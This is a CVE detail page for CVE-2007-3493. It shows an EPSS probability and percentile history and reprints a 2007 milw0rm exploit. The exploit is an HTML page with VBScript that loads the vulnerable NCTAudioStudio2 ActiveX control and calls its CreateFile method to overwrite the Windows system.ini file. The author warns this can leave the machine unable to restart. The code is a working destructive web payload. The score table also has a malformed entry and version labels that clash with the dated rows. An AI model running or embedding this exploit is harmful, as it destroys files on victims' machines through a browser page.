CVE-2007-3493 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	40.85%	–	–
2023-03-12	–	–	–	38.48%	–
2023-12-03	–	–	–	39.14%	–
2024-03-31	–	–	–	21.65%	–
2024-06-02	–	–	–	22.67%	–
2024-12-22	–	–	–	4.88%	–
2025-01-19	–	–	–	4.88%	–
2025-03-18	–	–	–	–	43.02%
2025-03-18	–	–	–	–	43.02,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	98%
2023-03-12	97%
2023-12-03	97%
2024-03-31	96%
2024-06-02	97%
2024-12-22	93%
2025-01-19	93%
2025-03-18	97%
2025-03-18	97%

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------- <b>NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method</b> url: http://www.nctsoft.com/products/NCTAudioEditor2/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not be responsible for any damage. <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits. -------------------------------------------------------------------------------------------------- <object classid='clsid:A77849B6-6125-4466-88DC-4855C014A0C4' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language='vbscript'> Sub tryMe On Error Resume Next Dim MyMsg If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _ "Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _ "THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _ " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _ " SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then test.CreateFile "c:\windows\system_.ini" MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"NCTAudioStudio2") Else MyMsg = MsgBox ("Nice, be safe!", 64, "NCTAudioStudio2") End If End Sub </script> </span></span> </code></pre> # milw0rm.com [2007-06-26]